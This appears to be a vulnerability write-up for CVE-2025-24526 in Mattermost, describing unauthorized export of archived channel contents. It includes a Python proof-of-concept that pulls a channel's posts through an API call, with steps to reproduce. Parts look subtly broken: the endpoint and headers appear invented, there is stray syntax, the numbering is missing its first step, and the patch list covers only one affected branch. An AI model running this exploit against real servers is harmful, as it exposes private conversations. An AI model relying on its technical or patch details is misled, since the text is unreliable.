CVE-2025-24526: Unauthorized Channel Export in Mattermost (versions 10.1.x <= 10.1.3, 10.4.x <= 10.4.1, 9.11.x <= 9.11.7, 10.3.x <= 10.3.2, 10.2.x <= 10.2.2)

Mattermost versions 10.1.x <= 10.1.3, 10.4.x <= 10.4.1, 9.11.x <= 9.11.7, 10.3.x <= 10.3.2, 10.2.x <= 10.2.2 have a vulnerability in the channel export functionality. When the "Allow users to view archived channels" setting is disabled, users should not be able to access or export the contents of archived channels. However, this vulnerability allows users to export the channel contents even when they are not authorized to do so.

Code Snippet

The code snippet below demonstrates how a user can bypass the disabled setting and export the channel contents.

import requests

# Replace these values with your own
mattermost_url = "https://your-mattermost-url.com";
api_key = "your-api-key"
channel_id = "channel-id-to-export"
user_id = "your-user-id"

url = f"{mattermost_url}/api/v4/channels/{channel_id}/posts/export?token={api_key}"
headers = {"content-type": "application/json", "user-id": user_id}
response = requests.get(url, headers=headers)

if response.status_code == 200:
    with open("channel_export.json", "wb") as f:
        f.write(response.content)
    print("Channel export successful")
else:
    print("Error exporting channel:", response.text)

This code snippet illustrates that a user can make an API call to the Mattermost server to export channel contents, even when the "Allow users to view archived channels" setting is disabled.

Links to the original sources discussing the vulnerability

1. Mattermost Security Advisory: CVE-2025-24526
2. National Vulnerability Database: CVE-2025-24526

Exploit Details

This exploit takes advantage of the fact that Mattermost does not properly enforce the "Allow users to view archived channels" setting in the export functionality. Here are the steps to reproduce the exploit:

Ensure that "Allow users to view archived channels" setting is disabled in Mattermost.

2. Use the code snippet provided above, replacing the values with your own Mattermost URL, API key, channel ID, and user ID.
3. Run the code snippet. If successful, you will see a message saying "Channel export successful" and a channel_export.json file will be created containing the channel contents.

Please note that the user should not have been able to export the channel contents since the "Allow users to view archived channels" setting is disabled. This exploit allows unauthorized access to potentially sensitive information within archived channels.

## Mitigation / Patch Information

To address this vulnerability, Mattermost has released patches for the affected versions. It is recommended to upgrade to the following patched versions immediately:

For 10.2.x users, upgrade to 10.2.3 or later.

To prevent the unauthorized export of archived channel contents in Mattermost, ensure that you are running a patched version of the software.

Timeline

Published on: 02/24/2025 08:15:10 UTC